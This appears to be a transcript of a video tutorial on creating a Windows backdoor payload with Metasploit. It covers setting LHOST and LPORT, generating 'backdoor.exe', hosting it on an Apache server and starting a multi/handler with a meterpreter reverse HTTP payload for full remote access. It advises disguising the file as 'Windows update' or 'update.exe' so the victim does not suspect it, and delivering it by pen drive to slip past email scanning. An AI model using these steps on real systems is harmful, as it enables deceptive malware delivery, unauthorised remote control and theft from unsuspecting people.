let's continue from where we left off. So this is the L port, port 8080, port of the Metasploit handler, and we need to set the L host IP of the Metasploit handler. So, so we just need to remember our IP address, which is 192.168.0.109. If you don't know your IP address, open up a new terminal and check for WLAN 0. And my IP address is inet. This is the IP address of the wireless network adapter. So I'll just copy this, copy selection, and I think I'll just close this for now and paste it right here. You can just type set lhost with control V, and type info, so that just to check if the lhost is set to 192.168.0.109, and you just type generate so that the payload gets generated. And you can just give the payload a name. I'll just give it backdoor.exe for now. Yep. So you can just name it whatever you want to. You can just name it as Python py or update Windows or Windows update, so that the victim does not suspect it. So you can just provide it whichever name you want to, and hit enter. For now, we have just given it as backdoor.exe. Usually exe files are very easily noticeable by antivirus systems, so I just tried this attack 10 minutes back, and my Avast antivirus was able to capture this. So we have successfully created the executable file, which is written to this location, and hit copy and open up your folder and just paste it right there. And once you control V, and I'll just cancel this, hit enter. So we have the backdoor.exe, hit properties, and I'll just remove the exe twice, or you can just leave it right here. Okay, close. Let me remove the exe. So this is our backdoor, this is our payload or virus. So it is a 32.8 gib, size is 6 gib, 6144 bytes, created today. You can take a look at all of the details and the permissions, which is root and read only. So you can just go ahead and paste this in your Apache server, copy and open up a new folder and search for Apache server var www.html/ hit enter, and you can just paste it right here. So once this is pasted, you'll just need to open up Google Chrome in the Windows operating machine, in the attacker's operating machine, and you can just start the attack. So I just exit evasion for now, clear, get back to your root terminal, hit clear, and you just need to start MSF console. And I'll open up my Google Chrome in Windows. So I have just opened up Google Chrome in my Windows operating machine, and you just need to download the payload from here. So just type just type http 192.168.0.109/backdoor and the name of backdoor exe. I think it was 1, and hit enter, and it has to go ahead and download all of the backdoor file. So it says save type as backdoor exe1, and it has to download. I have gone ahead and disabled my Avast antivirus with keep. So antivirus system, I have disabled all of the behavioral shield, web shield, mail shield, and file shield, and I have gone ahead and disabled the firewall also. So it just because it is an exe file, antivirus and Kaspersky or any other antivirus can easily detect it. But yeah, and I think even Windows 10 can detect it. Once you double click this, it starts running, and once the program starts running, you can just go ahead and open up MSF console from your Kali Linux machine. And once MSF console opens, you can just set the payload and lhost and hit exploit. So yeah, so even MSF console or Metasploit has a lot of exploits and payloads. You can take a look at the payloads. It has 1471 payloads where you can just go ahead and attack a Windows operating system. So it says MSF 6, and you can just type set payload, and you can just set the payload to Windows Meter session. So you can just go ahead and type Windows interpreter reverse TCP HTTP and hit enter, and it is set, and hit on show options. So it just gives you the set of options right here, and you can just set the lhost to 192.168.0.109, which is an IP address of Kali Linux, and hit enter and type exploit. Okay, it says unknown command for now, but I think you just need to start the I just forgot, you just need to start the multi-handler before using it. You just need to type use exploit multi-handler and hit enter. And now once we started the multi-handler, I'll just copy this for now, paste it right here, paste clipboard, hit enter, hit on show options, shift control V to show the different kinds of options. So the lhost is set and the local port is set to 8080. And now we just need to go ahead and hit on set lhost. Yep, and hit exploit. Okay, I think the interpreter session has started running, and let's just wait for this. And once okay, I just started HTTP, and once the victim double clicks the file, it just the attack just starts right here. Once the attack starts, the victim can get the entire access of the Windows operating system from here. So this is how you create a payload and send it to the victim. You can just send it however you want to, from a pen drive. If you try to send it through Gmail, probably Google's detection system will detect it. And if you just double click this exe, I think this exe is not executable for now because it has a .1 right here. You can just create a new exe file. I don't know why it is named exe.1, because I had created exe. You can just go ahead and delete this and create a new exe file, send it to the system, because now you know that how to send it. And once you double click this, the meter session starts right here. Once it starts, you have the full access to the computer system. You can just go ahead and delete that file. I'll just delete this exe. I'll just end this session. I'll just clear. I'll just exit Metasploit, and you can go ahead to Whale and create a new payload and name it as a Python py, or name it as virus, or name it as update.exe, and send it to the victim's computer, and download it from here. So I'll see you in the next video after I get the complete access.